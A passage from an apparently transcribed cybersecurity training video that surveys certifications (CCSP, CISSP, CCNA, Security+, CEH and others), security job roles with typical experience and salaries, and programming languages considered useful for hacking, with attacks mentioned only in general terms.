responsibility of the risk manager to identify which solution would benefit the organization in the long run. So that's where your cost benefit analysis comes in, and then you're going to implement the solution, and then you're going to continuously monitor it to ensure that the risk doesn't surface again. So it depends on which organization you're talking about, but you would need at least 3 to 4 years of experience in risk strategy before you become a risk manager. But these are the certifications that are going to identify and help you in your career path as we go ahead. Now, before we go into cloud computing courses, just one point that I want to highlight here. The first courses that we talked about were technical, the second were managerial in perspective. Now, even if it is IT security that we talk about, in today's world, it is more on the business side that everyone starts making sense. So for example, when you start talking to the management, you always will talk about it about security from a monetary perspective and a business impact analysis perspective. So as we go ahead in IT security career paths, you will always mature from a technical guy to a semi-technical guy and then over a period to a managerial person, and then probably the C-level executives like the CISO, the CFO, or the CTO, Chief Technology Officer. So let's start with the next topic, the cloud computing courses. As discussed, these are not mandatory, but with today's world where everybody has jumped onto the cloud computing bandwagon, you will want to expand your horizons and get cloud security under your belt as well. The two courses on your screen, the CCSP and the CCSK, are vendor neutral courses and are more towards the managerial perspective rather than technical perspective. So the CCSP is the Certificate of Cloud Security Professional. This certification is given to you by ISC², whereas the CCSK is a Certificate of Cloud Security Knowledge given to you by an organization called Cloud Security Alliance. CCSP, the Certificate of Cloud Security Professionals, again has a holistic view of cloud security. They have listed 6 different domains in the certification, and ISC² has created a common body of knowledge based on which it will give you a holistic view of what steps do you want to look at for various deployments in a cloud security. Now this becomes an advanced certification. The first certification that came across was the CCSK, which is from a non-profit organization called Cloud Security Alliance. Now this is again a web-based examination. This one is a little bit easier to attend than the CCSP. So if you want to enter the cloud security arena, I would suggest you start with the CCSK certificate and then move on to CCSP. If it is technical that you have in mind, then you become vendor specific. So either you go for Amazon Web Services for a public cloud or Microsoft Azure. Or if you want to look at private clouds, we've got VMware certifications and we've got Microsoft Hyper-V, we've got Citrix certifications. So depending on which vendor or which solution that you want to deal with, you'll have to identify those vendors and you'll have to get certified on those specific technologies. Each vendor has their own set of certifications. You can just visit their websites and they have a career path for their individual certifications there as well. Let's talk about advanced cybersecurity courses. Now, the gold standard in advanced cybersecurity courses is obviously the CISSP or the CISSP, which is the Certified Information Systems Security Professional. So when you're headed for the management courses or you're going to look at profiles like the Chief Technology Officer or the Chief Information Security Officer, you're looking at this particular course. This is a very difficult exam to crack because you need that experience. You just cannot read books, gather knowledge from those books and pass this exam. In fact, you have to prove that you have 5 years of experience in 2 of the domains that CISSP talks about. If you don't, you can still attempt the exam, but you get certified as an associate of the ISC square for CISSP and you got 6 years to complete the 5-year experience bracket. The passing rate of that exam is less than 50%, so it's a tough exam to crack. Currently, the exam consists of 100 to 150 questions and you have to answer those in 3 hours. Now that sounds like a simple task, but the areas that are covered in this certification are vast and the knowledge that is required and the experience that is required is very high as well. I have seen people gain around 15 years of experience in the IT field and then attempt the CISSP. That being said, I've also seen people with very good knowledge clear the exam by studying for just a couple of weeks. So it depends on how good you are, how good your knowledge is, how good your experience is, how good your understanding on various topics is, and based on that you can crack this exam easily as well. The domains in CISSP are as such. We start off with asset security, then we have security architecture and engineering, communications and network security, identity and access management, security operations, security assessment and testing, software development security, and security and risk management. Now we start off with security and risk management. It talks about again the risk assessment strategies, the risk assessments life cycles, risk calculators, and a lot of other terminology like an annual loss expectancy, a single loss expectancy, etc. Asset security will talk about physical assets or data assets and how you're going to secure them and the strategies revolving that. Security architecture and engineering will talk about models, security models or frameworks that will help us create a policy and administer that policy on our organization. Communication and network, obviously we'll talk about network security, different protocols. This topic is all about mapping the OSI layer, the TCP/IP layer, understanding which protocols work where, and the various encryption strategies that are there in securing communications. Identity and access management, this talks about access control lists, single sign-ons, and so on and so forth. Security operations, the day-to-day operations of a security operations center, where you're going to look at incident management, change management, and problem management. Security assessment and testing, vulnerability assessment and penetration testing. Software development security, the software development lifecycle, where you're going to talk about secure coding practices in an application. You're going to talk about various models that are utilized, like the waterfall model or the agile model, to be implemented for application security. So if you remember some slides back, we were talking about the various domains in cybersecurity. Now, if you map those slides with this, you will understand that CISSP basically governs everything that works in the IT security space. So it needs a lot of understanding, a lot of knowledge for this certification. So let's talk about the job roles in cybersecurity. Now, every organization will have its own naming convention and their job titles. So this may vary a little bit in the real world, but these are the baseline job requirements and job functions that would be available or that are required in today's world in cybersecurity. So let's start talking about these roles. So the first one is Chief Information and Security Officer, also known as CISO or CISO. Now, this is a very privileged position and is a managerial position in the organization. Here you own the cybersecurity of the entire organization, and your job role is to ensure proper policies, proper frameworks, and proper standards are followed in your organization. So it's a very holistic view that you have. There's no hands-on involved. You will not be involved in VAPT, but you may actually ask your team to conduct a vulnerability assessment and penetration test. If needs requires, you'll just take the reports, analyze them, and guide the rest of the team in how to proceed with those particular incidents. So you start off with at least a graduate degree in computer science or in IT security or a master's. That's a given. Your certifications could be all of these or any of these. A CISSP is a required certificate at this point in time. The systems auditor, systems manager, or the risk management certification would obviously help your cause and help you gain that knowledge that is required for this particular job role. Now, since this is a managerial role, the requirement is also very high. You will have to have at least 15 years of experience before you reach this position. So you already should have worked in the IT security field in multiple domains. You should have had these certifications during this period, which would then qualify you to become a CISO of an organization. Your skills obviously would be ethical hacking, no hands-on, but you understand those attacks, you know how they have done, you are conversant with how these technologies work, you know the OSI layer, the TCP layer, you know networking, you know how attacks can be created and perpetrated. Computer forensics, knowledge of that would obviously be necessary over here, or would be an advantage if you are certified in forensic investigations, because in case of a breach, you can guide the team of where exactly to look for what kind of data. Mobile security, for if your organization has a bring your own device policy, that would help you understand how to implement security parameters and how to control data that is going to leave your organization on some employees' mobile phones. An example here would be employees configuring their emails on their mobile phones, and thus the attachments can be downloaded on those phones, and you want to ensure that those documents or attachments do not get compromised. Cloud security is also necessary here, because most of the organizations that you will see will be connected to a cloud or will be consuming some services from the cloud. For example, Salesforce, customer relationship management softwares, or Office 365 getting integrated with an in-house domain. Networking knowledge is a must. Your work experience, like I said, would be around 15 years minimum, and you should have worked in network security. You should know storages. You should have a basic understanding of how hardware works. You should have skills on vendor management and protecting systems against advanced persistent threats. So you should know how IDSS, IPSS work. You should know the latest trends in the security market, and you should understand which vendors to approach at what point in time. Salaries could range from 100,000 USD to 125,000, or in India 15 lakh rupees to 25 lakh rupees. Now these are baseline salaries. It will obviously depend on what kind of an organization you are joining. If it's a startup, your salaries may not be that high, or if it's a global organization, your salaries could be way more than what have been projected on the screen. The next role we can talk about is an information security analyst. Now here again, the requirement is that you understand security from a holistic perspective. You're going to collect data, you're going to analyze that data, and you're going to interpret that data based on your knowledge, based on your experience, and try to figure out if there is something wrong or if there is something dishonest going on in the organization. For example, collecting a data dump of a networking device for a segment of time, and then analyzing the packets that are going through that particular segment to see if there are any background services running, any background data leakages happening. Or it could be as simple as you joining a security operations center, and when an incident arises, you become that security analyst where you analyze the incident, you try to investigate what has happened, and then you come out with what exactly has been impacted, and then try to find a resolution for that. So your baseline again is you're going to be a graduate in computer science or an IT security field. Masters would always be helpful, but here it is not required. A bachelor's degree is more than sufficient. So the certifications that you'll require here are the CISA Plus, which is the Cybersecurity Analyst from CompTIA, and the EC Council Security Analyst from EC Council. Now these two certificates help you understand how you can collect data, what data sources are available, and how to configure them, and how to analyze that data. That is what these courses are all about. The CISSP course again here would be an added advantage for you to understand how to convert that data into risk analysis and then give a business impact analysis to your manager along with the technical report. So the skills that you're going to require for this job: information assurance. Assurance is the part where you are investigating to ascertain that the security controls that have been implemented implemented, are working correctly. For example, there is a security architect who has identified that a firewall needs to be placed and there's a configuration that has been done on the firewall. A security analyst over a period of time will analyze the effectiveness of that particular firewall and see if there are any gaps or if there are any problems with the device and if it needs any more fine-tuning. You will also need to know a little bit of scripting languages. So Python, it's a scripting language, and when we say Linux over here, we're obviously talking about the bash scripting scenario where you can create your own scripts and use those scripts to analyze certain scenarios. Cryptography, again, encryption, understanding of encryption, how it works, because you're going to analyze that kind of data. So cryptography is a required skill set. Network security is a must across all platforms, across all roles, because that's how computers communicate with each other over the intranet and the internet. Work experience, network architecture, so courses like CCNA, CCNP, CCIE would be helpful for you to understand how network works. Now this is assuming that you're using Cisco devices. For other devices like Juniper, there are different courses from those vendors. Log management, so understanding how a syslog server works or how a SIEM tool works and utilizing those tools to collect data and use that data for further analysis. The salary here could vary from 95,000 to 123,000 USD or 5 lakhs to 18 lakhs per annum in India. Again, the salaries are baselines, depends on which organization you're joining. Startup may not be able to pay you that much. Global organization could pay you a lot more than what is being showcased. But these are the average salaries across all job roles. Right. So let's talk about the forensic computer analyst job profile. So the forensic computer analyst job role is where your job description would be to analyze after attack has been identified or an impact has been observed in your organization. So this job role would definitely be after the attack has happened. So you will be going in and you're going to try to analyze what got impacted, how did that attack happen, which all components have been affected, and if there has been any data breach. So the other role would be where you're going to do a reverse engineering, trying to identify who attacked you, IP addresses, MAC addresses, or any trace that you can find of the attacker. And how exactly did the attack take place? What was the vulnerability? What was the exploit? And that would give you a knowledge which you can pass on to the security analyst, who can then further try to resolve that particular problem. Your certifications would be CHFI, which is a Certified Hacking Forensic Investigation certificate that we saw from EC Council. There are other certificates in the market as well, such as CFCE and GCFA. The skills that you're going to require here are analytical skills. You're going to analyze a lot of data. Now understand the fact that the attack has happened. It has been identified by some reason, and you are being tasked with the requirement of identifying what exactly happened, what got affected, and to what extent has been the damage. So you're trying to reverse engineer something that has already happened, and you're going to try to think of how an attacker would have created that particular attack. Obviously, you'll have to create reports after that, and your report writing skills should be excellent. Your communication should be somewhat of a techno-managerial kind of a scenario. So you should be technical, you know all the technical things, but you can translate them into simple English for non-technical people to understand. Now understand the fact that when you send these reports to the management will have basic understanding of those keywords. They would not be technically adept of hacking or of forensics. So your report writing skills would be a huge requirement at this point in time. Your communications, how you communicate with your peers, how you're going to communicate your requirements, what you want for that analysis, what kind of tools do you require. And when you create those reports and you're going to communicate them or you're going to present them to the management in very precise manner, that's where your communication skills would be required. And your knowledge on digital storage devices, where you're going to acquire data and you're going to store that data. For example, there may be scenarios where a law enforcement agency may come in and you will have to collect that data in a manner where you have to store it and then present it in a court as evidence later on. So here, some requirements would be where you know the law of the land and you know how to acquire that evidence, how to store that evidence, you know the chain of custody, so that you can present that data in a court of law and prove that it is still valid data. Your work experience, you should know your operating systems, how those processes work, where the cache is, how is it stored, how is data processed, so that you can access those areas of the operating systems or those applications, and you can extract that data from those storage areas. Scripting languages would be required for you to create, let's say, PowerShell scripts or Bash scripts, depending on the operating system, and then automate some tasks for collecting some data. Data processing skills, because you're going to collect data, you're going to process that data, you're going to look at processes that are running in the background. So all of that would be required as a work experience. Salary again would vary from 69,000 to 114,000 USD, and in India around 5 lakhs to 18 lakhs per annum. Looking at a security architect's role. So a security architect is a person who designs and architects security. So your job role would be where, let's say there's a network deployment that's going to happen and you are being called in to design a plan on how you want to implement security on the entire network. Or you could be on the cloud and you want a new deployment on the cloud and you're talking about cloud security. So here you're going to design how that security is going to function. Your job roles would be where you want to place those firewalls, what kind of firewalls you want to place, or what kind of IDSS, IPSS, unified threat management systems, or endpoint antivirus systems would be required. Here you would be looking at security controls and placement of those security controls in various scenarios. For example, what kind of email filters do you want to create, or what kind of email scanning you want to implement in your organization to scan incoming attachments or outgoing emails. Another example would be where you are looking at routing and you're looking at how data packets are going to travel across the network, and you have some dedicated paths that you have to create to ensure that all those packets go through a firewall. A firewall is configured in a particular manner which will either allow or disallow that packet based on the configuration that you are going to suggest. Again, the baseline would be graduate in a computer science or an IT security field. Here, a master's degree would be advisable over the period of your career, right? And again, your courses like CEH, the Certified Ethical Hacking course, or the Security Plus, or the ECSA course, the EC Council Certified Security Analyst course would be prescribed. CISSP is open across all tables, across all job roles. So as you get experience and you've got at least 5 years of experience, that's when you try to attempt the CISSP certification. But you start off with CEH, then you move on to ECSA, Security Plus, and then that's your career path to become a security architect. Again, the experience here would be at least 7 to 8 years in IT security to become a successful security architect at an organizational level. Skills: operating systems, application security, cloud security, network security. You're going to design the security of an organization or of a particular product. So you need to know almost anything and everything there is about information technology. Work experience, as suggested, 7 to 8 years is ideal, but anything between 5 to 10 years would be a requirement in IT security. The 5 to 10 years of experience that we're talking about is entirely in IT security. So you either have a vulnerability management experience or a patch management experience, or you have experience in application security or in network security. So all of that combined should be around 5 to 10 years for you to become a successful security architect. Salaries would range from 50,000 to 100,000 US dollars and 6 lakhs to 20 lakhs in Indian rupees. Then let's talk about the IT security consultant. Now, the main job role of a consultant is to provide intelligence on various technologies. So here you could become a business consultant where you may need to go to the client side, check their requirements, come back to your organization, and then detail the team of the requirements and then map the solutions that you're going to offer based on those requirements. Or a client needs to implement a security architecture or needs to implement security controls. You as a consultant just advise them how it is done, what is required, what kind of policies should be there, and then provide that expertise to them. So this is basically more of a business oriented role from a security perspective. This is where you have to know it all. So not only technical, but you'll also need to have knowledge on how businesses function, what kind of security controls are available, and which security controls to position at what security areas. So again, physical security is also in play. You're going to talk about CCTV cameras. You're going to talk about physical security about server rooms. You're going to talk about disaster recovery and business continuity planning. So this basically becomes a consultant's view of how a business should function in the long run. Again, the educational requirement, a graduate degree in computer science or IT security or a master's degree is advisable at this point in time. CISSP, CRISC, CISM, these are a must. Like I said, these are advanced certifications and this is an advanced job profile as well. So assuming you have CISSP, that already assumes that you probably would have done your CEH or Security Plus or CISA Plus and those certifications earlier on in your career path. Here, programming skills, again, you shouldn't be a developer. That's not a requirement, but you should understand programming. You should look at secure coding practices and you should understand how those practices are to be implemented in a software development lifecycle. Risk management is a must at this point in time. You need to identify threats. You need to identify how those threats are posing a risk to to the organization, your risk management skills, how you're going to calculate that risk and present it to the management. Not only the next skill, not only firewalls, but IDS, IPSs, any security controls that you can implement, including identity access and management. Knowing your operating systems is a must. Windows, Linux, or maybe Mac, the various flavors of Linux operating systems, and understanding of encryption. Let's say how the public key infrastructure works, what is a private key, what is a public key, symmetric and asymmetric encryption, and all of those details is something that you should know. Work experience, a minimum around 5 to 10 years of professional experience, after which you can be eligible for a IT security consultant's job role. Salaries could vary from 80,000 to 86,000 US dollars and 5 lakhs to 19 lakhs in Indian rupees. Then we have the security systems administrator job profile. This is the systems administrator from a security perspective. So you're not going to be an administrator from administrator's perspective, such as administering Windows or Linux operating systems or their deployments, but you would be responsible for the security of these operating systems and creating a secure environment for the internal consumption of the organization. So as a security systems administrator, your job role would be to administrate, let's say, firewalls or the security of certain switches, routers, or data traffic, or you're going to analyze data traffic, or you're going to create rules of which protocols are allowed to pass through the firewall and which protocol should be blocked. The requirements, again, educational wise, you should be a graduate in computer science or IT security, CompTIA Security Plus, CEH, CCNP, CCNA. These are the certifications that you want to look at to become a system administrator. Skills, computers, networks is a must. So networking skills, understanding of how OSPF, BGP protocols work, maybe even VoIP. So SIP protocol comes into the picture here. Understanding the TCP/IP and the OSI layer, how these function, at what layer which protocol works, how these protocols translate into each other, and how the data packet is transmitted. Firewalls, any security controls, and your operating systems. Work experience, around 4 to 7 years of experience in the network field would allow you to be eligible for a systems security administrator profile. Salary here could be around 100,000 to 110,000, and in India it would be around 2 lakhs to 9 lakh Indian rupees. Then we have the IT security engineer. Now the IT security engineer would be a job role where you are a part of the security operations center, and there are incidents that come on in daily for the organization, which you are going to investigate, and you're going to try to resolve those incidents. So again, graduate in computer science or in IT security, graduation would be required. CEH, CCNP, CCNA, or Security Plus, these are the certifications that you want to look at. Problem solving skills, that's a must, because you're going to be solving those problems on a day-to-day basis, and you will have certain time frames that you have to adhere to. Computer languages, that's if you are going to be an application security engineer as well, where you want to debug some problems later on to analyze what the root cause was, and then try to translate that into and try to create a resolution based on that analysis. Support skills, because you're going to support the day-to-day activity of the organization. So whenever there is an incident, you will be the person who would be called. You're going to support these individuals who have faced these incidents, and you're going to resolve these problems for them. If the organization is using a cloud knowledge would be required. For example, there was an incident that happened on Office 365, and you're called in to analyze and collect logs from those particular deployments. So your understanding of cloud would help you at that point in time. Networking, obviously, yes, because again, like I said, network is the way where you're going to communicate on the intranet and the internet. So those skills would be required across all IT job profiles in the security field. Work experience, you should know security control, experience in securing cloud, maybe an ITIL or ITIL, the Information Technology Infrastructure Library certification would be something that you want to look at, because that talks about incident management, problem management, and change management, which is something that you'll be doing on a daily basis as a security engineer. Salaries would vary from 106,000 to 129,000 US dollars, or 3 lakhs to 10 lakhs Indian rupees. Then we have a penetration tester's profile. Now, this is completely technical. This is where you are an ethical hacker. So you're going to craft exploits, you're going to create those attacks, and you're going to try and figure out if those attacks can be successful against an organization. And if yes, you're going to create those reports and send it to your manager. So it's a complete hands-on role, complete technical role. And this is where your knowledge about anything and everything that is technical in the computer field is a must. So again, a graduate degree in information technology technology or cybersecurity, CEH, Security Plus, and LPT. Now CEH, Certified Ethical Hacker, or Security Plus, these are baselines where penetration testing is taught. So these courses basically talk about ethical hacking, what are the requirements of an ethical hacker, how you're going to utilize these tools, and how you're going to create those attacks. So these are hands-on certifications which teach you how these attacks work, how to recreate those attacks yourselves, and what to expect out of those attacks. LPT, or the Licensed Penetration Tester, is an advanced certification which comes after the ECSA course, EC Council Security Analyst course. So this, as the name says, is a license from EC Council, which gives you a certificate to showcase that you have the required skills to become a penetration tester. Your skills, problem solving, scripting languages would be 100% necessary at this point in time, because you're going to create your own attacks. So you may have a requirement where you have to create your own PowerShell script to create an attack, or a bash script, or maybe writing an exploit in Metasploit in Ruby language. Knowledge of operating systems and software, so how applications work, what is an application programming interface, what is a common gateway interface, how do they transmit data, how do they handle data, how do applications talk to each other, how do applications talk to a database, and vice versa. All of those requirements come into the picture. Networking protocols, of course, networking, like I said, across all job profiles in IT security. Work experience, 2 to 4 years of experience in security with practice in penetration testing. So 2 to 4 years as a penetration tester. Now the question is, if you don't have experience, then how do you become a penetration tester? So there's a lot of bug bounty programs where you can enroll, and you can do it as a freelancer to hone your skills. And when you get those bounties against your name, you can use them as experience in your profiles, which would be counted against those 2 to 4 years of experience as a penetration tester. Again, salaries would be from 50,500 USD to 100,000. In Indian rupees, it would be around 3.5 lakhs to 12 lakhs per annum. So these are the job roles in cybersecurity.
Let's understand the importance of knowing programming for hacking. You might wonder if programming is a necessity to become a hacker. As you might be aware, hacking involves breaking the protocols and exploiting a network. Thus, being a hacker requires you to understand the languages of the software that you are focusing on. Hence, it is required that a hacker knows coding. Having zero coding knowledge will definitely limit your opportunities in the future. Knowing different programming languages is undoubtedly an asset for hackers. Everyone wants to become a hacker today. However, it is not as easy as it is shown in numerous movies. It takes plenty of practice and programming knowledge to become an ethical hacking expert. If you want to become a hacker, it is imperative that you have a knack for programming languages. It is a known fact that some of the world's best hackers started off as programmers. If you know how to program, you will be able to dissect a code and analyze it. You can write your scripts or malware that can be used on the victim. Yes, there are several ready-made scripts available today. However, you might need to apply your skills in case the available scripts don't work well for you. Sometimes when script modification is required, you should be in a position to do that. In such a scenario, zero knowledge of the respective programming language will definitely be a hindrance. Programs can also help you automate multiple tasks which would normally take a lot of time. Codes allow you to penetrate different fields you want to hack. It will help you identify the plan behind an attack and defend against deadly hacking techniques and make your cybersecurity career worthwhile. It will help you understand the working of the target system or application before carrying out an exploit. Now that we have an idea as to why programming is important for hackers, let us understand which programming languages should a hacker learn. There are several programming languages for hacking, and it might be overwhelming to choose from the endless list. Here we are to help you with that. Do keep in mind that your choice of programming language will also depend on the type of system you are targeting and your strategy. Let us now move on to the list of the top programming languages that are extensively used by hackers around the world. As you see on your screens, here we have the top 5 programming languages for hackers. Let us go through them one by one. Number 1 on our list is one of the most popular programming languages today, that is Python. Python is a general-purpose programming language, and in the field of hacking, it is mainly used for exploit writing. It is referred to as the de facto hacking programming language. It plays a crucial role in writing hacking scripts, exploits, and malicious programs. One great feature that makes hacking easy with Python is the availability of ready-made modules. For example, OS modules are available if the target is a native operating system. For networking, there is a socket module and a lot more. Python socket programming can be used for discovering vulnerabilities in a system, since Python code helps in checking the security integrity of systems, and it can also be used to exploit them. Python has a massive community that helps with third-party plugins every day. It is also an easy-to-read language with a simple syntax. This will be helpful for beginners. You can easily write automation scripts using Python, and it also makes prototyping much faster. Moving on to our second programming language, we have JavaScript. Currently, JavaScript is one of the best programming languages for hacking web applications. A good understanding of JavaScript allows a hacker to discover vulnerabilities and carry web exploitations, since most of the web apps use JavaScript or one of its libraries. Knowing JavaScript will help you discover flaws in web applications. JavaScript can be used to read saved cookies, and security experts also use JavaScript to develop cross-site scripting programs for hacking. JavaScript is known for carrying out attacks like cross-site scripting. JavaScript can also be used to spread and reproduce malware and viruses easily. Initially, JavaScript was a client-side scripting language. However, with the release of Node.js, it now supports back-end development. This implies a larger field for exploitation. A hacker can now use JavaScript to snoop the typed words, inject malicious code, and track browsing history, to name a few. Number 3 on our list is PHP. Hypertext Preprocessor, or PHP, is a dynamic server-side programming language that is used to build websites. Hackers should understand PHP, as it will help them understand web hacking techniques better. Especially if you're into web hacking, then getting your hands on PHP would be an asset. PHP is used in server-side scripting. Using PHP, you could write a custom application that modifies settings on a web server and makes the target server susceptible to attacks. With the help of PHP, you can also eliminate any vulnerabilities in your code. PHP is one of the most powerful server-side languages used in most of the web domains. This shows how learning PHP can help you with web hacking and also help you fight against malicious attackers. Popular content management systems run on a foundation of PHP. Hence, having a strong knowledge of PHP can help you protect or compromise such websites. Next on our list of the best programming languages for hackers is SQL. SQL is the acronym for Structured Query Language. Although SQL is not a traditional programming language, it is a language used for only communicating with databases. Several systems like MySQL, PostgreSQL store their data in databases. SQL is used to interact with such databases in order to organize, add, retrieve, delete, or edit data from a database. Having an in-depth knowledge of SQL lets you comprehend the structure of a database, thereby helping you decide which scripts or tools to deploy. SQL is used for the purpose of web hacking. SQL is undoubtedly the best programming language when it comes to hacking into large databases. It will be impossible to counteract database attacks without a good understanding of SQL. Using SQL, hackers can perform an attack known as SQL injection attack. Such an attack enables hackers to access confidential information from databases. SQL is used by hackers to develop various hacking programs based on SQL injection. SQL injection is used to bypass web application login algorithms that are weak. Such an attack can also help a hacker view and modify confidential information from databases. Finally, at number 5, we have the C programming language. It is no surprise that we have C, the mother of all programming languages, on our list. It is used massively in the security field. It helps with exploit writing and development. The low-level nature of C provides an edge over other programming languages used for hacking. A hacker can use the C programming language to his or her advantage when it comes to accessing low-level hardware components such as the RAM. Security professionals mostly use C when they are required to manipulate system resources and hardware. C also helps penetration testers write programming scripts. Most operating systems and computer programs are coded in C language. Hence, learning C, you will help hackers get an overview of the structure of operating systems. C is also used to create shellcodes, rootkits, exploits, build undetectable malware, keyloggers, and much more. Sometimes it is also advisable to learn both C and C++ as they both come in handy for hackers. So those were our top 5 programming languages for hackers. Do keep in mind that the most important step of becoming a hacker is to learn various programming languages. It will be great if you can master a variety of programming languages, as your target will not be the same always. On that note, in addition to previously mentioned programming languages, we have an additional list of languages that are also well recognized for hacking. Let's have a look at our honorary mention. First, we have Ruby. The Ruby programming language has been used for exploitation for quite some time now. There can be a close comparison drawn between Ruby and Python based on its syntax. However, Ruby is more web-focused. Ruby can be used to write either small or large scripts and can be used interchangeably with Bash scripting. It offers good flexibility while writing exploits. Ruby has been used by several hackers to exploit corporate systems. It is not that easy to master Ruby, and that is one reason why MNCs look for professionals who know Ruby. Second, we have Perl. Although Perl has lost its old fame, it still holds value in the hacker community for exploit writing. There are systems that still run on Perl, as it was the go-to solution once. It is a great language that can help you manipulate Linux text files and help you create tools and exploits. Perl code bases still do occupy a considerable portion of corporate tools. Third on our list is HTML. Many of you might have wondered why we didn't mention HTML yet. Yes, no programming list is complete without mentioning HTML. The hypertext markup language, HTML, is a standard markup language used for creating web pages. It glues the whole internet together, and it is the language of the web. This shows the importance HTML has. An understanding of HTML is vital to play with web applications. HTML also finds its use in developing hybrid mobile and desktop apps. HTML is a must if you want to master this field. Having said that, HTML is not that tough a language to learn. Hence, it is advised to master HTML if you want to compromise web applications. And finally, at 4 we have assembly level language. It is undoubtedly one of the most powerful yet hardest programming languages to learn. It is a complicated low-level programming language. For hacking primitive systems, assembly is one of the best programming languages. The best part of assembly is that you can instruct machine hardware or software using it. Assembly language helps a hacker manipulate systems straight up at the architecture level. It is also the most suited coding language to build malware like viruses and trojans. It is considered to be the best language for jobs that are time critical. Reverse engineers use assembly language. For example, if you're interested in software cracking and if you want to reverse engineer a piece of software that has already been compiled, assembly is the go-to choice. As complicated as a language sounds, the results it produces are highly fruitful. So those were the additional programming languages that can help you become a skilled and successful hacker. We should keep in mind that a strong understanding of programming languages helps cybersecurity professionals stay on top of cyber criminals.
Importance of a cybersecurity certification. First and foremost, when I see a certification, I look at it from 3 different aspects. The first is the training itself, which allows me to gain the knowledge, which allows me to understand the aspects of security or whatever the certification is there for. The second aspect is the exam itself. How do I need to prepare myself for the exam, and how do I need to approach the exam? How do I need to ensure that I pass in my first attempt? And the third aspect is the certification itself, which allows me to be eligible to apply for a particular job role. So, obtaining a cybersecurity certification ensures or shows to the organization that you're applying to that you do have that prerequisite knowledge and you should be shortlisted for an interview. The knowledge that you have gained during the training will help you when you attend that interview and when you attempt to answer the questions asked to you. So, these certifications are designed for a specific role. For example, a forensic investigation certificate will teach you how to investigate a crime scene forensically, a digital crime scene for a matter of fact. A certified ethical hacking course will teach you about penetration testing. So, it is you who's going to decide which certification you require and then get certified on it. Of course, a fresher with a cybersecurity certification will have better employment opportunities because they can showcase their knowledge with the certification that they already have. Even professionals who want to enhance their careers can get into managerial or advanced certifications to improve on their knowledge and get promoted in their job profiles. So, cybersecurity certifications can be classified in 3 different aspects. The first one being the foundational level, then the managerial level, and the advanced level. In the previous video, we just had a small overview. Here we are going to discuss about what the certification covers, how the exams are conducted, and the price points for each and every exam. So let's start with the foundational certifications. We start off with CCNA, which is the basic certification for networking. So the CCNA routing and switching certification, basically it helps you build your networking career. You will join an organization as a networking engineer where you can help the organization establish the routing, the pathing of how data packets will travel across the network. This certification covers all the basic concepts that you require to understand networking. The basic requirements for this certification are that the candidate must have a bachelor's degree, but apart from that, there are no other prerequisites. So it's just that you need a bachelor's degree, and then you can apply, you can study for this, you can undergo a training, and then you can attempt the exam. The certification provider obviously is Cisco, so the knowledge that is limited to this training and certification is for Cisco devices only. The exam fees for this certification is approximately $325. The exam, when it is conducted, it has around 50 to 60 odd questions which need to be answered in 90 minutes. The type of questions that you're going to get is multiple choice questions, where you have a question and 4 answers and you have to choose the correct answers among those. Drag and drop, where you have to click on an object and drag it to its appropriate place, probably an architectural diagram, and you have to, let's say, pick on a router and place it into a particular position. If you place it correctly, you answer the question correctly, otherwise it's wrong. And a simulator, where there could be a configuration. You need to configure it in a particular manner and then check whether the configuration is correct or not. The pass mark is around 800 to 850 out of a possible 1000 marks. So each question will have a different weightage depending on the depth of the question, depending on the difficult level of the question or the difficulty level of the question, which would then count towards your marks. And if you score 800 to 850, that's when you clear the exam. The job roles, as we have discussed over here, would be more on the network administrator side or a network engineer side, depending on the level of experience that you have. The salaries that are expected from this job roles in the US are around $55,000 to $90,000 annually. The next one is the CompTIA certification called Security Plus. CompTIA is also a global certification authority for InfoSec courses. So this certification teaches candidates on how to secure applications, networks, and devices. It focuses on hands-on practical skills in the field of network security. I have trained people on this certification myself, so I know this certification is quite hands-on. It deals with the concepts to the core. It helps you understand the concepts, and then in the practical hands-on demo, you need to execute the practical yourself so that you can gain that knowledge. The recommended level for a candidate to attempt this training would be at least around 2 years of experience in the IT sector. In addition, if you have already been certified for Network Plus certification from CompTIA, which is the baseline networking certification, this is also a preferred way to go for this certification. As said, CompTIA is the certificate provider, and the exam fees for this certification is $339. The exam is quite simple, 90 questions in 90 minutes. That's 1 minute per question. It sounds like a lot of time, but believe me, the questions can be a little bit confusing, can be a little bit lengthy, so you will require all those 90 minutes to answer those questions, especially when they're tricky and they're technical in nature. The questions would be multiple choice and performance based. The pass mark for this exam is around 750 points out of a possible 900. The job profiles for this kind of a certification is when you want to apply for a security analyst position or a security engineer's position, where you're going to analyze some data to understand and figure out what problems are ongoing in the organization. The average annual salary of this person would be around $72,000. Then comes the CEH, or the Certified Ethical Hacker training from EC Council. Now, this is a very well-known course. And also, EC Council is a global certifying authority, very well accepted across a lot of countries. This is an offensive certification. So here you're basically trying to become a penetration tester. You're taught how to hack. You're taught how to attack a particular organization from an ethical hacker's perspective. So the job profiles that you'll be looking here are of a pen tester, where you go into an organization, you test their security controls or you test their devices, find out flaws within them, and then provide recommendations of how to plug those flaws or mitigate those flaws and improve the security of that organization. It is recommended that you have 2 years of experience at least in networking or security for these to attempt this kind of trainings and certifications. Again, a basic understanding of networking, maybe a little bit of applications, operating systems would be necessary before attempting this certification. The certification provider is EC Council, and the exam fees for this certification is $500. So the exam here would be 125 questions, which needs to be attempted in 4 hours, and you will only get multiple choice questions in here. Now for CEH, there are 2 exams. One is the multiple choice questions, and the second is a practical exam where you need to solve some given problems to you in an iLab scenario, and if you are able to solve them properly, you then get certified for CEH practical. The cutoff varies from 65 to 85% depending on the questions that you have answered and the weightage associated with each and every question. As said, the job roles would be as a penetration tester or a security engineer, and your salaries would start from around $90,000 annually. Then comes the CND, or the Certified Network Defender, also from EC Council. Now this is more on the network defense side. So here again the job roles would be where there's a network that you have and you're going to try to secure the network and the communications that are going to travel over the network. So you need to be a network administrator, a network security engineer, or in a similar profile to understand how networks work, and then you're going to attempt to secure those networks. The certificate provider again is EC Council, and the certification is placed a little bit below CEH. So it becomes network, defense, then CEH, where you're going to become a penetration tester. The exam fees for this certification is $350. The exam is of 100 questions to be answered in 4 hours. Again, it's just a multiple choice questions. So you get a question with 4 options, you answer the correct one, and you move on to the next question. The pass percentage again varies from 60 to 85% depending on the questions answered and the weightage of that question. Job roles to be applied: network defense technician, CND analyst, or a security analyst from a network perspective. Salaries would range from $65,000 to $75,000 per annum. Then comes the forensic investigator course, which is exactly what it is: digital forensic investigator. This will help you understand how computers work, where data is stored, and how you can retrieve that data to investigate a crime that has taken place. So the candidate must have at least 2 years of experience in the information security sector. They need a good understanding of how networks work, how computers work, how operating systems work, how they store data, the location where that data is stored, how databases work, how those databases store those data, and so on and so forth. This certification is sought after mainly in the law enforcement areas, but there are a few corporates 